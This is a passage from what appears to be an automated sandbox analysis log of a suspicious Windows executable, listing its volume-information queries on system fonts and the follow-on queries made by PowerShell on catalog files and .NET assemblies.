            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
